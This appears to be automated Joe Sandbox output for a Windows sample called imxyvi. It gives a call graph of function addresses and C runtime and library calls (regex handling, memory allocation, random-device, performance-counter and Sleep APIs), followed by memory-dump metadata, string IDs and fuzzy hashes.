?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15317->15683 15327 7ff6a9535ef0 15325->15327 15326 7ff6a9534213 15326->15188 15326->15193 15327->15326 15328 7ff6a9535fae 15327->15328 15331 7ff6a9532430 strchr 15327->15331 15380 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15328->15380 15331->15327 15333 7ff6a9536871 15332->15333 15343 7ff6a9536393 15332->15343 15422 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15333->15422 15335 7ff6a953687b 15423 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15335->15423 15337 7ff6a9536491 15348 7ff6a953649f 15337->15348 15365 7ff6a95366c9 15337->15365 15338 7ff6a95365a5 15340 7ff6a9536646 15338->15340 15341 7ff6a95365ae 15338->15341 15339 7ff6a9532430 strchr 15342 7ff6a95365a0 15339->15342 15358 7ff6a9536655 15340->15358 15340->15365 15362 7ff6a95365bc 15341->15362 15341->15365 15352 7ff6a953431e 15342->15352 15424 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15342->15424 15343->15337 15343->15338 15346 7ff6a95363bd 15343->15346 15345 7ff6a9532430 strchr 15350 7ff6a9536501 15345->15350 15346->15339 15347 7ff6a9536891 15425 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15347->15425 15348->15345 15349 7ff6a953676e 15353 7ff6a953676c 15349->15353 15363 7ff6a953678f 15349->15363 15350->15335 15350->15346 15351 7ff6a9532430 strchr 15355 7ff6a9536626 15351->15355 15352->15207 15366 7ff6a9535fc0 15352->15366 15353->15352 15426 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15353->15426 15354 7ff6a9532430 strchr 15354->15355 15381 7ff6a9537a60 15355->15381 15357 7ff6a9532430 strchr 15357->15352 15358->15354 15362->15351 15363->15352 15363->15357 15364 7ff6a9532430 strchr 15364->15365 15365->15347 15365->15349 15365->15353 15365->15363 15365->15364 15367 7ff6a95360a7 15366->15367 15368 7ff6a9535fe2 15366->15368 15367->15202 15429 7ff6a9538ab0 15368->15429 15371 7ff6a953601a 15436 7ff6a9538090 15371->15436 15374 7ff6a9532430 strchr 15375 7ff6a9536095 15374->15375 15375->15202 15382 7ff6a9537b36 15381->15382 15389 7ff6a9537a7e 15381->15389 15382->15342 15383 7ff6a9537b41 15383->15382 15427 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15383->15427 15384 7ff6a9537b4f 15428 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15384->15428 15387 7ff6a9532430 strchr 15387->15389 15389->15382 15389->15383 15389->15384 15389->15387 15430 7ff6a9535ffb 15429->15430 15432 7ff6a9538aef 15429->15432 15430->15367 15430->15371 15433 7ff6a9536a70 15430->15433 15431 7ff6a9538b30 ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 15431->15432 15432->15430 15432->15431 15434 7ff6a953a968 std::_Facet_Register 3 API calls 15433->15434 15435 7ff6a9536a83 15434->15435 15435->15371 15437 7ff6a95380c0 15436->15437 15438 7ff6a953603f 15437->15438 15439 7ff6a953a968 std::_Facet_Register 3 API calls 15437->15439 15438->15374 15439->15437 15441 7ff6a9537d70 15440->15441 15443 7ff6a9537b79 15440->15443 15448 7ff6a9537d79 15441->15448 15469 7ff6a9537ca6 15441->15469 15442 7ff6a9532430 strchr 15445 7ff6a9537bca 15442->15445 15443->15442 15444 7ff6a9537ee9 15444->15231 15447 7ff6a9537bda 15445->15447 15445->15469 15446 7ff6a9532430 strchr 15460 7ff6a9537dcc 15446->15460 15449 7ff6a9537c49 15447->15449 15466 7ff6a9537be6 15447->15466 15448->15446 15452 7ff6a9537c59 15449->15452 15455 7ff6a9535fc0 6 API calls 15449->15455 15450 7ff6a9537e5a 15450->15231 15451 7ff6a9532430 strchr 15453 7ff6a9537ed9 15451->15453 15456 7ff6a9535ed0 2 API calls 15452->15456 15462 7ff6a9537c5d 15452->15462 15453->15231 15454 7ff6a9537d59 15454->15231 15455->15452 15459 7ff6a9537c7e 15456->15459 15457 7ff6a9532430 strchr 15461 7ff6a9537c37 15457->15461 15458 7ff6a9532430 strchr 15463 7ff6a9537e40 15458->15463 15464 7ff6a9537c8e 15459->15464 15465 7ff6a9537c82 15459->15465 15460->15450 15460->15458 15461->15231 15462->15231 15494 7ff6a95393b0 15463->15494 15468 7ff6a9536380 26 API calls 15464->15468 15465->15461 15520 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15465->15520 15466->15457 15472 7ff6a9537c96 15468->15472 15469->15444 15469->15451 15469->15454 15472->15231 15475 7ff6a9537f1c ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 15474->15475 15476 7ff6a9537f44 15474->15476 15475->15476 15477 7ff6a9537f9a 15476->15477 15480 7ff6a953a968 std::_Facet_Register 3 API calls 15476->15480 15486 7ff6a953805e 15476->15486 15478 7ff6a9537fab 15477->15478 15479 7ff6a9537fce 15477->15479 15477->15486 15490 7ff6a9537fc1 15478->15490 15577 7ff6a9538170 15478->15577 15481 7ff6a9537fe6 15479->15481 15483 7ff6a953a968 std::_Facet_Register 3 API calls 15479->15483 15480->15476 15484 7ff6a9538007 realloc 15481->15484 15485 7ff6a9538024 15481->15485 15483->15481 15484->15485 15488 7ff6a953801d ?_Xbad_alloc@std@ 15484->15488 15485->15486 15487 7ff6a9538043 realloc 15485->15487 15486->15231 15487->15486 15489 7ff6a9538057 ?_Xbad_alloc@std@ 15487->15489 15488->15485 15489->15486 15490->15231 15504 7ff6a95393d6 15494->15504 15495 7ff6a953946f 15497 7ff6a953947c 15495->15497 15498 7ff6a95394b1 15495->15498 15518 7ff6a95395c2 15495->15518 15500 7ff6a9538ab0 2 API calls 15497->15500 15501 7ff6a95394b6 15498->15501 15502 7ff6a95394d0 15498->15502 15499 7ff6a95395ca 15545 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15499->15545 15505 7ff6a9539497 15500->15505 15506 7ff6a95395d5 15501->15506 15521 7ff6a9539e90 15501->15521 15503 7ff6a95394af 15502->15503 15508 7ff6a95395dd 15502->15508 15536 7ff6a953a020 15502->15536 15515 7ff6a9532430 strchr 15503->15515 15504->15495 15511 7ff6a9532430 strchr 15504->15511 15505->15499 15514 7ff6a9538090 3 API calls 15505->15514 15546 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15506->15546 15547 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15508->15547 15511->15504 15514->15503 15519 7ff6a953954a 15515->15519 15544 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15518->15544 15543 7ff6a9532420 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15519->15543 15548 7ff6a953a100 15521->15548 15523 7ff6a953a100 17 API calls 15527 7ff6a9539ec9 15523->15527 15524 7ff6a9539f12 memcmp 15524->15527 15525 7ff6a9539fed _invalid_parameter_noinfo_noreturn 15528 7ff6a9539ff4 15525->15528 15526 7ff6a953a960 _Receive_impl free 15526->15527 15527->15523 15527->15524 15527->15525 15527->15526 15529 7ff6a953a968 std::_Facet_Register 3 API calls 15527->15529 15533 7ff6a9539fb2 15527->15533 15531 7ff6a953a960 _Receive_impl free 15528->15531 15529->15527 15530 7ff6a9539ff9 15532 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15530->15532 15531->15530 15535 7ff6a953a006 15532->15535 15533->15528 15533->15530 15534 7ff6a9539fe6 _invalid_parameter_noinfo_noreturn 15533->15534 15534->15525 15535->15503 15537 7ff6a953a04e 15536->15537 15538 7ff6a953a968 std::_Facet_Register 3 API calls 15537->15538 15542 7ff6a953a07c 15537->15542 15538->15542 15539 7ff6a953a0dd 15539->15503 15540 7ff6a953a0af realloc 15541 7ff6a953a0f6 ?_Xbad_alloc@std@ 15540->15541 15540->15542 15542->15539 15542->15540 15549 7ff6a953a2ed 15548->15549 15550 7ff6a953a15c 15548->15550 15552 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15549->15552 15551 7ff6a953a1dd 15550->15551 15553 7ff6a953a310 15550->15553 15556 7ff6a953a189 15550->15556 15557 7ff6a953a1b5 15550->15557 15555 7ff6a953a1e1 ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD 15551->15555 15554 7ff6a953a2fc 15552->15554 15558 7ff6a95323e0 ?_Xlength_error@std@@YAXPEBD 15553->15558 15554->15527 15569 7ff6a953a207 15555->15569 15559 7ff6a953a196 15556->15559 15560 7ff6a953a30b 15556->15560 15561 7ff6a953a968 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 15557->15561 15562 7ff6a953a316 15558->15562 15563 7ff6a953a968 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 15559->15563 15564 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 15560->15564 15565 7ff6a953a1bd memcpy 15561->15565 15567 7ff6a953a19b 15563->15567 15564->15553 15565->15555 15566 7ff6a953a246 15568 7ff6a953a2af 15566->15568 15571 7ff6a953a2aa 15566->15571 15573 7ff6a953a2a3 _invalid_parameter_noinfo_noreturn 15566->15573 15567->15565 15570 7ff6a953a2e1 _invalid_parameter_noinfo_noreturn 15567->15570 15568->15549 15568->15570 15572 7ff6a953a2e8 15568->15572 15569->15566 15569->15573 15574 7ff6a953a960 _Receive_impl free 15569->15574 15570->15572 15575 7ff6a953a960 _Receive_impl free 15571->15575 15576 7ff6a953a960 _Receive_impl free 15572->15576 15573->15571 15574->15566 15575->15568 15576->15549 15578 7ff6a953819f 15577->15578 15579 7ff6a953818e ?tolower@?$ctype@D@std@@QEBADD 15577->15579 15580 7ff6a953a968 std::_Facet_Register 3 API calls 15578->15580 15583 7ff6a95381b6 15578->15583 15579->15578 15580->15583 15581 7ff6a95381f2 15581->15478 15582 7ff6a95381d7 realloc 15582->15581 15584 7ff6a95381eb ?_Xbad_alloc@std@ 15582->15584 15583->15581 15583->15582 15584->15581 15586 7ff6a953a968 std::_Facet_Register 3 API calls 15585->15586 15587 7ff6a9536984 15586->15587 15588 7ff6a953a968 std::_Facet_Register 3 API calls 15587->15588 15589 7ff6a95369c5 15588->15589 15590 7ff6a9532700 51 API calls 15589->15590 15591 7ff6a9536a32 15590->15591 15592 7ff6a9532970 3 API calls 15591->15592 15593 7ff6a9536a3e 15592->15593 15594 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15593->15594 15595 7ff6a9534464 15594->15595 15595->15166 15597 7ff6a95356b2 15596->15597 15601 7ff6a9535775 15596->15601 15607 7ff6a9535ca0 15597->15607 15598 7ff6a9535830 15598->15274 15601->15598 15621 7ff6a9535a00 15601->15621 15608 7ff6a9535ccd 15607->15608 15616 7ff6a9535714 15607->15616 15609 7ff6a9535ce7 15608->15609 15610 7ff6a9535ec3 15608->15610 15613 7ff6a9535d31 15609->15613 15614 7ff6a9535d43 memset 15609->15614 15609->15616 15648 7ff6a9532400 ?_Xlength_error@std@@YAXPEBD 15610->15648 15628 7ff6a9538de0 15613->15628 15614->15616 15617 7ff6a9537810 15616->15617 15618 7ff6a9537828 15617->15618 15619 7ff6a9535767 15617->15619 15618->15619 15620 7ff6a95378e8 memset 15618->15620 15619->15274 15620->15619 15622 7ff6a9535a2c 15621->15622 15625 7ff6a9535bcd 15622->15625 15650 7ff6a9539a20 15622->15650 15624 7ff6a9535ba2 15624->15625 15654 7ff6a9532400 ?_Xlength_error@std@@YAXPEBD 15624->15654 15625->15598 15629 7ff6a9538f5c 15628->15629 15634 7ff6a9538e05 15628->15634 15649 7ff6a95323e0 ?_Xlength_error@std@@YAXPEBD 15629->15649 15631 7ff6a9538f61 15632 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 15631->15632 15633 7ff6a9538f67 15632->15633 15634->15631 15635 7ff6a9538e99 15634->15635 15636 7ff6a9538e70 15634->15636 15644 7ff6a9538e63 15634->15644 15637 7ff6a953a968 std::_Facet_Register 3 API calls 15635->15637 15636->15631 15641 7ff6a953a968 std::_Facet_Register 3 API calls 15636->15641 15637->15644 15638 7ff6a9538ec5 15640 7ff6a9538edf memcpy 15638->15640 15639 7ff6a9538eb4 memset 15639->15640 15642 7ff6a9538ef9 15640->15642 15643 7ff6a9538f2a 15640->15643 15641->15644 15645 7ff6a9538f22 15642->15645 15646 7ff6a9538f55 _invalid_parameter_noinfo_noreturn 15642->15646 15643->15616 15644->15638 15644->15639 15644->15646 15647 7ff6a953a960 _Receive_impl free 15645->15647 15646->15629 15647->15643 15651 7ff6a9539a4d 15650->15651 15652 7ff6a9539cb2 memcpy 15651->15652 15653 7ff6a9539a55 15651->15653 15652->15653 15653->15624 15653->15653 15657 7ff6a9535871 15655->15657 15656 7ff6a95358d0 15659 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15656->15659 15657->15656 15658 7ff6a95358cb 15657->15658 15660 7ff6a95358c4 _invalid_parameter_noinfo_noreturn 15657->15660 15661 7ff6a953a960 _Receive_impl free 15658->15661 15662 7ff6a95358e0 15659->15662 15660->15658 15661->15656 15662->15288 15664 7ff6a9536b34 15663->15664 15666 7ff6a9536b50 15663->15666 15665 7ff6a95347e0 16 API calls 15664->15665 15664->15666 15665->15666 15667 7ff6a9536d4b 15666->15667 15668 7ff6a9536b82 15666->15668 15669 7ff6a953a968 std::_Facet_Register 3 API calls 15667->15669 15670 7ff6a953a968 std::_Facet_Register 3 API calls 15668->15670 15671 7ff6a9536d55 15669->15671 15672 7ff6a9536b91 15670->15672 15673 7ff6a953a968 std::_Facet_Register 3 API calls 15671->15673 15674 7ff6a953a968 std::_Facet_Register 3 API calls 15672->15674 15675 7ff6a9536d91 15673->15675 15676 7ff6a9536bc9 15674->15676 15677 7ff6a953a968 std::_Facet_Register 3 API calls 15676->15677 15678 7ff6a9536c0b 15677->15678 15679 7ff6a953a968 std::_Facet_Register 3 API calls 15678->15679 15680 7ff6a9536c46 15679->15680 15681 7ff6a953a968 std::_Facet_Register 3 API calls 15680->15681 15682 7ff6a9536c7c 15681->15682 15682->15302 15700 7ff6a9533a80 15686->15700 15688 7ff6a9532fb0 15733 7ff6a9533000 15688->15733 15691 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15695 7ff6a9530831 15691->15695 15692 7ff6a9532f65 15692->15688 15693 7ff6a9531540 8 API calls 15692->15693 15693->15692 15694 7ff6a9531540 8 API calls 15698 7ff6a9532e34 15694->15698 15695->14518 15695->14520 15695->14522 15698->15692 15698->15694 15699 7ff6a9533a80 34 API calls 15698->15699 15721 7ff6a9534f50 15698->15721 15726 7ff6a9535150 15698->15726 15699->15698 15701 7ff6a9533ac1 memset 15700->15701 15717 7ff6a9533aba 15700->15717 15739 7ff6a9533e30 15701->15739 15704 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15706 7ff6a9533c7d 15704->15706 15706->15698 15709 7ff6a9533bca 15710 7ff6a9533c33 15709->15710 15713 7ff6a9533c2c _invalid_parameter_noinfo_noreturn 15709->15713 15714 7ff6a9533c38 15709->15714 15711 7ff6a953a960 _Receive_impl free 15710->15711 15711->15714 15712 7ff6a9533c5f 15715 7ff6a9533d20 3 API calls 15712->15715 15713->15710 15761 7ff6a9533d20 15714->15761 15715->15717 15716 7ff6a9533bb5 15718 7ff6a9534d40 29 API calls 15716->15718 15717->15704 15718->15709 15719 7ff6a9534d40 29 API calls 15720 7ff6a9533b2d 15719->15720 15720->15709 15720->15716 15720->15719 15722 7ff6a9535138 15721->15722 15724 7ff6a9534f7c 15721->15724 15722->15698 15723 7ff6a953510f 15723->15698 15724->15723 15725 7ff6a9531540 8 API calls 15724->15725 15725->15724 15727 7ff6a95355c2 15726->15727 15732 7ff6a953517b 15726->15732 15727->15698 15728 7ff6a953557b 15729 7ff6a9531540 8 API calls 15728->15729 15730 7ff6a953544e 15728->15730 15729->15730 15730->15698 15731 7ff6a9531540 8 API calls 15731->15732 15732->15728 15732->15730 15732->15731 15734 7ff6a9533011 15733->15734 15735 7ff6a9532fbc 15733->15735 15736 7ff6a9533059 15734->15736 15737 7ff6a9533074 _invalid_parameter_noinfo_noreturn 15734->15737 15735->15691 15738 7ff6a953a960 _Receive_impl free 15736->15738 15738->15735 15740 7ff6a9533ede 15739->15740 15741 7ff6a9533f30 15740->15741 15742 7ff6a9533f23 15740->15742 15745 7ff6a9533b1f 15740->15745 15744 7ff6a9533f35 memset 15741->15744 15741->15745 15774 7ff6a95376a0 15742->15774 15744->15745 15746 7ff6a9534d40 15745->15746 15747 7ff6a9534d5d 15746->15747 15748 7ff6a9534d6b 15746->15748 15794 7ff6a95355e0 15747->15794 15750 7ff6a9535690 12 API calls 15748->15750 15751 7ff6a9534d8b 15750->15751 15752 7ff6a9534da8 15751->15752 15754 7ff6a9534dc7 15751->15754 15755 7ff6a9534dd5 15751->15755 15814 7ff6a9536e50 15752->15814 15758 7ff6a95376a0 8 API calls 15754->15758 15755->15752 15756 7ff6a9534dda memset 15755->15756 15756->15752 15758->15752 15759 7ff6a95355e0 7 API calls 15760 7ff6a9534e4e 15759->15760 15760->15720 15762 7ff6a9533d38 15761->15762 15763 7ff6a9533d69 15761->15763 15764 7ff6a9533dc6 _invalid_parameter_noinfo_noreturn 15762->15764 15765 7ff6a953a960 _Receive_impl free 15762->15765 15763->15764 15766 7ff6a9533da7 15763->15766 15770 7ff6a9533daf 15763->15770 15768 7ff6a9533e13 15764->15768 15769 7ff6a9533de2 15764->15769 15765->15763 15767 7ff6a953a960 _Receive_impl free 15766->15767 15767->15770 15768->15712 15771 7ff6a9533e0b 15769->15771 15772 7ff6a9533e27 _invalid_parameter_noinfo_noreturn 15769->15772 15770->15712 15773 7ff6a953a960 _Receive_impl free 15771->15773 15773->15768 15775 7ff6a95377f8 15774->15775 15780 7ff6a95376c1 15774->15780 15793 7ff6a95323e0 ?_Xlength_error@std@@YAXPEBD 15775->15793 15777 7ff6a95377fd 15778 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 15777->15778 15779 7ff6a9537803 15778->15779 15780->15777 15781 7ff6a9537728 15780->15781 15782 7ff6a9537751 15780->15782 15789 7ff6a953771b 15780->15789 15781->15777 15788 7ff6a953a968 std::_Facet_Register 3 API calls 15781->15788 15783 7ff6a953a968 std::_Facet_Register 3 API calls 15782->15783 15783->15789 15784 7ff6a9537779 memcpy 15786 7ff6a95377c4 15784->15786 15787 7ff6a9537793 15784->15787 15785 7ff6a953776e memset 15785->15784 15786->15745 15790 7ff6a95377bc 15787->15790 15791 7ff6a95377f1 _invalid_parameter_noinfo_noreturn 15787->15791 15788->15789 15789->15784 15789->15785 15789->15791 15792 7ff6a953a960 _Receive_impl free 15790->15792 15791->15775 15792->15786 15795 7ff6a9535621 15794->15795 15800 7ff6a9535634 15794->15800 15795->15748 15796 7ff6a9535667 15796->15748 15797 7ff6a9538dc9 15827 7ff6a95323e0 ?_Xlength_error@std@@YAXPEBD 15797->15827 15798 7ff6a9538dce 15801 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 15798->15801 15800->15796 15800->15797 15800->15798 15803 7ff6a9538cc8 15800->15803 15804 7ff6a9538cf1 15800->15804 15811 7ff6a9538cbb 15800->15811 15802 7ff6a9538dd4 15801->15802 15803->15798 15808 7ff6a953a968 std::_Facet_Register 3 API calls 15803->15808 15805 7ff6a953a968 std::_Facet_Register 3 API calls 15804->15805 15805->15811 15806 7ff6a9538d25 memcpy 15807 7ff6a9538d8b 15806->15807 15809 7ff6a9538d3f 15806->15809 15807->15748 15808->15811 15810 7ff6a9538d80 15809->15810 15812 7ff6a9538dc2 _invalid_parameter_noinfo_noreturn 15809->15812 15813 7ff6a953a960 _Receive_impl free 15810->15813 15811->15806 15811->15812 15812->15797 15813->15807 15815 7ff6a9536e9b 15814->15815 15816 7ff6a9536e83 15814->15816 15818 7ff6a9536ebd 15815->15818 15819 7ff6a9536eb1 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15815->15819 15816->15815 15817 7ff6a9536e8f ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15816->15817 15817->15815 15820 7ff6a9536ef5 15818->15820 15821 7ff6a95374e7 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 15818->15821 15819->15818 15822 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15820->15822 15823 7ff6a95374f3 15821->15823 15824 7ff6a9534e2f 15822->15824 15828 7ff6a95323e0 ?_Xlength_error@std@@YAXPEBD 15823->15828 15824->15759 15824->15760 15831 7ff6a952e99d 15830->15831 15832 7ff6a952e9f8 15831->15832 15833 7ff6a952e9b3 memcpy 15831->15833 15835 7ff6a9531060 10 API calls 15832->15835 15833->14534 15836 7ff6a952ea0b 15835->15836 15836->14534 15838 7ff6a952e904 15837->15838 15839 7ff6a952e920 memcpy 15838->15839 15840 7ff6a952e95f 15838->15840 15839->14537 15842 7ff6a9531060 10 API calls 15840->15842 15843 7ff6a952e972 15842->15843 15843->14537 15845 7ff6a95312f5 15844->15845 15846 7ff6a953135e 15844->15846 15845->15846 15847 7ff6a953136e _invalid_parameter_noinfo_noreturn 15845->15847 15848 7ff6a953a960 _Receive_impl free 15845->15848 15846->14661 15848->15845 15850 7ff6a9514449 15849->15850 15851 7ff6a95145e5 15849->15851 15854 7ff6a95311f0 7 API calls 15850->15854 15852 7ff6a95311f0 7 API calls 15851->15852 15861 7ff6a95145d2 15852->15861 15853 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 15855 7ff6a9514617 15853->15855 15856 7ff6a9514480 15854->15856 15855->14696 15857 7ff6a95144e1 memset 15856->15857 15858 7ff6a9514509 15856->15858 15857->15858 15859 7ff6a95311f0 7 API calls 15858->15859 15860 7ff6a9514592 15859->15860 15860->15861 15862 7ff6a95145cd 15860->15862 15863 7ff6a95145c6 _invalid_parameter_noinfo_noreturn 15860->15863 15861->15853 15864 7ff6a953a960 _Receive_impl free 15862->15864 15863->15862 15864->15861
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual$Concurrency::cancel_current_taskQuery_perf_counterQuery_perf_frequencyRandom_device@std@@_invalid_parameter_noinfo_noreturnmallocmemset
                                                                                                                                                                                                                                                                                      • String ID: $.$50~jb$60~jb$:$:$L$L$L$L$L$L$N$N$P$P$R$T$V$X$\$d$d$d$d$d$d$d$d$d$d$d$d$d)65R$h$random
                                                                                                                                                                                                                                                                                      • API String ID: 3798647520-2963567472
                                                                                                                                                                                                                                                                                      • Opcode ID: 42275f3cae16e6603f25840b50eb10b059038975867f818a907f2377d8b07a39
                                                                                                                                                                                                                                                                                      • Instruction ID: 27f9f4b53c6d2376d1cec86ddf0106e9d03ea9a7e8eda6bd7dd4680bb7249bf0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42275f3cae16e6603f25840b50eb10b059038975867f818a907f2377d8b07a39
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAD3FE22D1ABC146E722DF34E4522E9A354FFE6784F50D336DA8DE6A56EF38E1418700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Random_device@std@@$Query_perf_counterQuery_perf_frequency$memchrmemset$Concurrency::cancel_current_taskCreateFactoryGlobalMemoryStatusmallocmemcmp
                                                                                                                                                                                                                                                                                      • String ID: random
                                                                                                                                                                                                                                                                                      • API String ID: 4003858199-373021397
                                                                                                                                                                                                                                                                                      • Opcode ID: 85ec301d491fd2310ed0f22648462cc47573b5d311b3cbae73e8ede98453b60d
                                                                                                                                                                                                                                                                                      • Instruction ID: 618ab7b2eec667c0e6155b0ed7e4177d0f0b85a6b400ea527017cd383f5d82a1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85ec301d491fd2310ed0f22648462cc47573b5d311b3cbae73e8ede98453b60d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F933E732A15A8285DB21DF34D8922FD6364FF99788F609331DA4EDBA95DF38D645C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?_Random_device@std@@YAIXZ.MSVCP140(00000000,0000006E00000006,?,00000000,-8000000000000000), ref: 00007FF6A9523778
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9532150: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A9532358
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9532150: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A9532365
                                                                                                                                                                                                                                                                                      • _Query_perf_frequency.MSVCP140(?,00000000,-8000000000000000), ref: 00007FF6A9523A7D
                                                                                                                                                                                                                                                                                      • _Query_perf_counter.MSVCP140(?,00000000,-8000000000000000), ref: 00007FF6A9523A86
                                                                                                                                                                                                                                                                                      • log.API-MS-WIN-CRT-MATH-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9523D4B
                                                                                                                                                                                                                                                                                      • cos.API-MS-WIN-CRT-MATH-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9523D57
                                                                                                                                                                                                                                                                                      • sin.API-MS-WIN-CRT-MATH-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9523D63
                                                                                                                                                                                                                                                                                      • exp.API-MS-WIN-CRT-MATH-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9523D74
                                                                                                                                                                                                                                                                                      • pow.API-MS-WIN-CRT-MATH-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9523DD3
                                                                                                                                                                                                                                                                                      • tan.API-MS-WIN-CRT-MATH-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9523E2E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A968: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953A982
                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,-8000000000000000), ref: 00007FF6A9523EFA
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A952447C
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A9524483
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,-8000000000000000), ref: 00007FF6A95244F3
                                                                                                                                                                                                                                                                                      • SleepEx.KERNELBASE(?,00000000,-8000000000000000), ref: 00007FF6A9524505
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
